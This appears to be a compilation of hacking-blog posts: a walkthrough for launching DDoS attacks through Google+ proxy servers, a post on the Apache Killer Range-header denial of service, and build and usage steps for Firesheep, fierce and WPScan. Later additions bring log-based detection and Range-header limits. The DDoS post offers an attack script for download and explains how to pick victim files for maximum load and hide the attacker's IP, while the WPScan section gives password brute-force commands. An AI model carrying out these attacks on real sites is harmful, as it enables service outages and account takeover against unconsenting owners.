Categories
Penetration Testing Web Exploitation Tools

Launch DDoS Attack Using Google Servers with +DDoS Bash Script

Recently we wrote about Apache Killer, which freezes a victim server in seconds. Now a new finding by IHTeam shows that Google+ servers can be used to launch a DDoS attack. Let's talk about this tiny script; it is small, but it is worth a look.

How does a DDoS attack using Google+ servers work?

When you post a URL in your Google+ status, Google+ fetches a summary of that URL (an image plus a short description) through its own proxy servers.

The advisory says the vulnerable endpoints are "/_/sharebox/linkpreview/" and "gadgets/proxy?".

If you ask these endpoints to fetch the same target URL many times in parallel (e.g. 1000 requests), Google+'s huge bandwidth is turned against the target: the victim is hit by Google's proxies, not by the attacker's own connection.

How to use the script to launch a DDoS attack using Google+ servers?

Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com

Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh

Make it executable :
chmod u+x ddos.sh

Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

A note on the example:
Pick the full path to a large file on the target that can be downloaded without a CAPTCHA or login, so that each proxied request pulls as many bytes as possible.

e.g http://www.victim-website.com/some-file-url/file-name.mp3

NOTE: the second argument is the number of parallel requests. Make sure your workstation can handle it; otherwise it will freeze and you will have to force a restart.

1000 is already a very large number.

On the victim's side the requests arrive from Google's proxy addresses, not from the attacker's real source IP.
See the sample Apache access log below:

209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
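The same log, seen from the defender's side. The block below is an added example and is not part of the original post or of the ddos.sh script: it runs over constructed log lines modelled on the sample above (the 10.0.0.5 visitor is made up) and reports paths that Google's fetcher is pulling repeatedly, with the byte volume and the number of distinct proxy IPs involved.

```shell
#!/bin/sh
# Added example, not part of the original post or of the ddos.sh script: find paths on
# your own server that are being hammered through Google's fetcher. The log lines are
# constructed to match the shape of the sample above; "10.0.0.5" is an ordinary visitor.
SAMPLE_LOG='209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
10.0.0.5 - - [31/Aug/2011:15:34:18 +0000] "GET /index.html HTTP/1.1" 200 4120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/6.0"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"'

# feedfetcher_hits LOGTEXT MIN: one line per path fetched by Feedfetcher-Google at least
# MIN times, giving the hit count, bytes served and the number of distinct proxy IPs.
# Field positions follow the Apache combined log format: $1 client IP, $7 request path,
# $10 response size.
feedfetcher_hits() {
    printf '%s\n' "$1" | awk -v min="$2" '
        /Feedfetcher-Google/ {
            hits[$7]++
            bytes[$7] += $10
            ips[$7 " " $1] = 1          # one entry per (path, source IP) pair
        }
        END {
            for (p in hits) {
                if (hits[p] < min) continue
                n = 0
                for (k in ips) if (index(k, p " ") == 1) n++
                printf "%s hits=%d bytes=%d distinct_ips=%d\n", p, hits[p], bytes[p], n
            }
        }'
}

# Eight proxied fetches of one 636 KB file within 16 seconds, from eight different
# Google addresses, is the signature; a genuine link preview is one or two fetches.
feedfetcher_hits "$SAMPLE_LOG" 5
```

Run it against a real access log with `feedfetcher_hits "$(cat /var/log/apache2/access.log)" 20`. Do not simply block the Feedfetcher user agent: that also kills legitimate Google+ link previews for your site. A narrower response is to rate-limit, or return 403 to that user agent for, large static files only.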

The same proxy can be used from a browser to fetch a page without exposing your own IP to that page (replace the url parameter with the page of your choice):

https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none

If you have any questions or are unable to run this, feel free to write to us.

Categories
Penetration Testing Web Exploitation Tools

Apache Killer – Denial of Service Flaw in Apache WebServer

We were following a thread about an Apache flaw discovered by KingCope.

What is the 'Apache Killer' flaw?

The script sends many GET requests whose Range header carries dozens of byte ranges, which eats up the server's memory. A byte range lets a browser or download manager request only the parts of a file it needs, which saves bandwidth. Apache Killer abuses this by putting dozens of overlapping, unsorted ranges into the Range header of each request, and Apache does work for every one of them until it runs out of resources.

It is a DoS condition on the Apache web server. I performed a test with a script written by @KingCope and can confirm that it will eat up server resources in seconds.

A patch is not yet available from apache.org; we are still waiting for an update from Apache.

When someone runs this attack against your server, it will eat up 1 GB of RAM in about 10 seconds, the load average will climb to 10, and the server will finally freeze. Test it against your own server before Apache releases the fix.
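Until the fix lands, the practical questions are what the hostile header looks like and how to refuse it. The block below is an added example, not KingCope's script: it builds a Range header of the shape described above (the exact values are constructed from that description, not copied from the tool) and applies the stop-gap rule Apache's advisory suggested, treating a request with more than five byte ranges as hostile.

```shell
#!/bin/sh
# Added example, not KingCope's script: build a Range header of the shape the post
# describes (many overlapping, unsorted byte ranges) and apply the stop-gap rule from
# Apache's advisory, refusing requests that carry more than five ranges.

# killer_range N: "bytes=0-,5-0,5-1,...,5-(N-1)". The shape is constructed from the
# description above, not copied from the tool.
killer_range() {
    n=$1
    i=0
    h="bytes=0-"
    while [ "$i" -lt "$n" ]; do
        h="$h,5-$i"
        i=$((i + 1))
    done
    printf '%s\n' "$h"
}

# range_count HEADER: number of comma-separated ranges in a Range header value.
range_count() {
    printf '%s\n' "$1" | awk -F',' '{ print NF }'
}

# range_ok HEADER: succeed (0) for no header or at most five ranges, fail (1) otherwise.
# A legitimate download manager rarely asks for more than a handful of ranges per request.
range_ok() {
    [ -z "$1" ] && return 0
    [ "$(range_count "$1")" -le 5 ]
}

# To see the effect on a server you own and are allowed to test (needs network):
# curl -s -o /dev/null -w '%{http_code}\n' -H "Range: $(killer_range 1300)" http://localhost/
for h in "bytes=0-499" "bytes=0-99,100-199,200-299" "$(killer_range 1300)"; do
    if range_ok "$h"; then
        echo "accept ($(range_count "$h") ranges)"
    else
        echo "reject ($(range_count "$h") ranges)"
    fi
done
```

The same rule can be expressed in Apache configuration with mod_setenvif and mod_headers (flag a Range header containing five or more commas, then unset it), which is what the advisory recommended as a workaround until a fixed release was out; dropping the header turns a malicious request into a plain full-file download instead of a refused one.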

Categories
HowTos Linux Penetration Testing Privilege Escalation

How to install FireSheep on Linux

What is FireSheep ?

It is not new: Firesheep is an old Firefox add-on that captures session cookies from unencrypted traffic on the local network. Here is how to build and install it on Linux.

Let's start:

Check out the repository:

git clone https://github.com/codebutler/firesheep.git

Output :

Initialized empty Git repository in /root/firesheep/.git/
remote: Counting objects: 1020, done.
remote: Compressing objects: 100% (605/605), done.
remote: Total 1020 (delta 589), reused 770 (delta 402)
Receiving objects: 100% (1020/1020), 5.48 MiB | 123 KiB/s, done.
Resolving deltas: 100% (589/589), done.

cd firesheep/
git submodule update --init

Output :

Submodule 'backend/deps/http-parser' (git://github.com/ry/http-parser.git) registered for path 'backend/deps/http-parser'
Initialized empty Git repository in /root/firesheep/backend/deps/http-parser/.git/
remote: Counting objects: 815, done.
remote: Compressing objects: 100% (328/328), done.
remote: Total 815 (delta 549), reused 735 (delta 483)
Receiving objects: 100% (815/815), 185.18 KiB | 95 KiB/s, done.
Resolving deltas: 100% (549/549), done.
Submodule path 'backend/deps/http-parser': checked out '459507f534c807d8ba741730fbc36d4b93b133c1'

Dependencies :

apt-get install libpcap-dev xulrunner-1.9.2-dev libboost-all-dev libtool libhal-dev autoconf

Compilation :

./autogen.sh
make

DONE!

How to load it into Firefox?

firefox build/firesheep.xpi

Categories
DNS Analysis Penetration Testing

Fierce – DNS Analysis perl script

Introduction

Fierce is a very lightweight DNS scanner, written by RSnake in Perl, that helps you locate the hostnames and IP space belonging to a target domain. It uses several techniques to gather information about the target: it first tries a zone transfer and, if transfers are refused, quickly switches to brute forcing hostnames from a wordlist.

As you know, we are using the world's favourite penetration testing distribution, BackTrack Linux 5, and fierce ships with it by default.

Let's see how it is used. I will be analyzing the DNS records of alibaba.com.

Fierce Usage :

Change into the application folder:

cd /pentest/enumeration/dns/fierce

Usage:

perl fierce.pl [-dns example.com] [OPTIONS]

Useful options:

-threads (number of parallel lookups; by default it runs a single thread)
-file (save output to a file)
-range (scan an internal IP range; it can only be used together with the -dnsserver option)

In our case:

perl fierce.pl -dns alibaba.com -threads 5 -file alibaba-dns.output

You should see the following output :

Now logging to alibaba-dns.output
DNS Servers for alibaba.com:
nshz.alibabaonline.com
nsp2.alibabaonline.com
ns8.alibabaonline.com
nsp.alibabaonline.com
Trying zone transfer first…
Testing nshz.alibabaonline.com
Request timed out or transfer not allowed.
Testing nsp2.alibabaonline.com
Request timed out or transfer not allowed.
Testing ns8.alibabaonline.com
Request timed out or transfer not allowed.
Testing nsp.alibabaonline.com
Request timed out or transfer not allowed.
Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way… brute force
Checking for wildcard DNS…
** Found 97326869336.alibaba.com at 67.215.65.132.
** High probability of wildcard DNS.
Now performing 1895 test(s)…
205.204.112.6 ad.alibaba.com
205.204.112.1 au.alibaba.com
205.204.112.1 cache.alibaba.com
110.75.203.17 billing.alibaba.com
205.204.112.1 co.alibaba.com
110.75.197.7 cn.alibaba.com
205.204.116.17 channel.alibaba.com
205.204.124.3 crm.alibaba.com
... and so on; the list of discovered hosts continues for hundreds of lines.
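Notice the wildcard check in the output: 97326869336.alibaba.com resolved, so every name in the wordlist would "exist" unless answers matching the wildcard address are discarded. The block below is an added example, not fierce's own code: it reproduces the three steps shown above (zone transfer, wildcard check, brute force) with dig, and wraps the resolver in a function so the wildcard filtering can be exercised offline by pointing RESOLVE at a stub. The domain example.test, the addresses 192.0.2.x and the wordlist path are placeholders.

```shell
#!/bin/sh
# Added example, not fierce's own code: the three steps fierce runs (zone transfer,
# wildcard check, brute force), written with dig so the logic is visible. The resolver
# is wrapped in a function so the wildcard filtering can be exercised offline by
# pointing RESOLVE at a stub; everything else assumes dig is installed and a network.

# resolve NAME: print the IPv4 address(es) of NAME, nothing if it does not resolve.
# Set RESOLVE to the name of another shell function to replace dig (used for offline tests).
resolve() {
    if [ -n "${RESOLVE:-}" ]; then
        "$RESOLVE" "$1"
    else
        dig +short A "$1" 2>/dev/null | grep -E '^[0-9]+(\.[0-9]+){3}$'
    fi
}

# try_axfr DOMAIN: ask each authoritative name server for the whole zone
# ("Trying zone transfer first..." above). Prints the zone and returns 0 on the first
# server that answers; returns 1 when all of them refuse.
try_axfr() {
    domain=$1
    for ns in $(dig +short NS "$domain"); do
        echo "Testing $ns"
        zone=$(dig "@$ns" "$domain" AXFR +noall +answer 2>/dev/null)
        if printf '%s\n' "$zone" | grep -q 'IN[[:space:]]*SOA'; then
            printf '%s\n' "$zone"
            return 0
        fi
        echo "Request timed out or transfer not allowed."
    done
    return 1
}

# wildcard_ip DOMAIN: resolve a random label that cannot exist; an answer means the
# zone has a wildcard record (the "97326869336.alibaba.com" check in the output above).
wildcard_ip() {
    resolve "$(awk 'BEGIN { srand(); printf "%d", rand() * 1e9 }').$1" | head -n 1
}

# brute_force DOMAIN WORDLIST: try WORD.DOMAIN for every word in the file. Answers that
# are only the wildcard address are dropped; without that, a wildcard zone would make
# every name in the list look real.
brute_force() {
    domain=$1
    wordlist=$2
    wild=$(wildcard_ip "$domain")
    [ -n "$wild" ] && echo "** High probability of wildcard DNS ($wild)." >&2
    while IFS= read -r word; do
        [ -z "$word" ] && continue
        for ip in $(resolve "$word.$domain"); do
            [ "$ip" = "$wild" ] && continue
            echo "$ip $word.$domain"
        done
    done < "$wordlist"
}

# fierce_lite DOMAIN WORDLIST: zone transfer first, brute force if that fails.
fierce_lite() {
    try_axfr "$1" && return 0
    echo "Unsuccessful in zone transfer (it was worth a shot)"
    brute_force "$1" "$2"
}

# Usage against a live domain (needs network and a wordlist, one label per line):
# fierce_lite alibaba.com /path/to/wordlist.txt
```

Hosts that legitimately share the wildcard address are invisible to this filter, which is the same blind spot fierce itself has; a second pass that compares the returned page or certificate for such names is how you would dig those out.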

Categories
Penetration Testing

Penetration Testing Execution Standard


PTES, the Penetration Testing Execution Standard, provides a set of guidelines that help you carry out a successful penetration test. This is a recorded technical talk that offers direction on where the security industry needs to head; David talks in depth about the future of PTES.

Watch the video and share your thoughts with us. We will be posting some very good magazines that can help you improve your skills.

Categories
Penetration Testing Web Application Analysis

WPScan – WordPress Security Scanner

 

Exploiting, Injecting WordPress
Wordpress Blackbox testing

What is WPScan?

WPScan is a fast WordPress vulnerability scanner written in Ruby, sponsored by RandomStorm and hosted on Google Code. It gives you an easy way to assess WordPress blogs using black-box techniques.

You can find out the following about any WordPress blog with it:

  • List of installed plugins
  • Name of the theme
  • Brute forcing a weak password for a specific user
  • Enumerating usernames
  • Directory listings
  • Version details
  • Possible vulnerabilities
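The first three of those come out of the page itself: the version from the generator meta tag, the theme and the plugins from the wp-content paths that the page links to. The block below is an added example and is not WPScan's code: it reduces that black-box fingerprinting to three checks over a page's HTML. SAMPLE_HTML is a constructed page and blog.example is a placeholder host, so it runs offline; the commented curl line shows the same functions on a live site.

```shell
#!/bin/sh
# Added example, not WPScan's code: the kind of black-box fingerprinting WPScan does,
# reduced to three checks that run over a page's HTML. SAMPLE_HTML is a constructed
# page and blog.example a placeholder, so the functions can be tried offline.
SAMPLE_HTML='<html><head>
<meta name="generator" content="WordPress 3.2.1" />
<link rel="stylesheet" href="http://blog.example/wp-content/themes/twentyeleven/style.css" type="text/css" />
<script src="http://blog.example/wp-content/plugins/akismet/akismet.js"></script>
<script src="http://blog.example/wp-content/plugins/contact-form-7/scripts.js?ver=3.0"></script>
</head><body><p>Hello world!</p></body></html>'

# wp_version HTML: the version WordPress advertises in its generator meta tag, if present.
wp_version() {
    printf '%s\n' "$1" | sed -n 's/.*<meta name="generator" content="WordPress \([0-9.]*\)".*/\1/p' | head -n 1
}

# wp_theme HTML: the active theme, taken from the first wp-content/themes/NAME/ path.
wp_theme() {
    printf '%s\n' "$1" | grep -o 'wp-content/themes/[^/"]*' | head -n 1 | sed 's#wp-content/themes/##'
}

# wp_plugins HTML: every plugin whose assets the page references, one per line, deduplicated.
# Only plugins that load something on the page show up this way; a scanner also has to
# probe /wp-content/plugins/NAME/ directly for plugins that stay silent on the front page.
wp_plugins() {
    printf '%s\n' "$1" | grep -o 'wp-content/plugins/[^/"]*' | sed 's#wp-content/plugins/##' | sort -u
}

# wp_fingerprint HTML: one summary line, e.g.
# "version=3.2.1 theme=twentyeleven plugins=akismet,contact-form-7".
wp_fingerprint() {
    printf 'version=%s theme=%s plugins=%s\n' \
        "$(wp_version "$1")" "$(wp_theme "$1")" "$(wp_plugins "$1" | paste -s -d, -)"
}

wp_fingerprint "$SAMPLE_HTML"
# Live site (needs network): wp_fingerprint "$(curl -s http://www.hackersgarage.com/)"
```

An empty version field is itself information: sites that strip the generator tag usually still leak the version through readme.html or the ?ver= query strings on their scripts, which is why a real scanner checks more than one place.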

How to Install WPScan?

Before you install WPScan, you have to install a number of dependencies that this tiny Ruby application needs. By the way, I am using BackTrack 5 Linux.

Dependencies :

apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus

WPScan Installation :

cd /pentest/web/
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
cd wpscan

How to use WPScan?

It is almost ready. One more thing we need is a wordlist to use for brute forcing.

wget http://static.hackersgarage.com/darkc0de.lst.gz
gunzip darkc0de.lst.gz

Example usage of this tiny application:

Do ‘non-intrusive’ checks…
ruby ./wpscan.rb --url www.hackersgarage.com

Do wordlist password brute force on enumerated users using 50 threads…
ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the ‘admin’ username only…
ruby ./wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --username admin

Generate a new ‘most popular’ plugin list, up to 150 pages…
ruby ./wpscan.rb --generate_plugin_list 150

Enumerate installed plugins…
ruby ./wpscan.rb --url www.hackersgarage.com --enumerate p

Still in trouble with the configuration? Ask in the comments.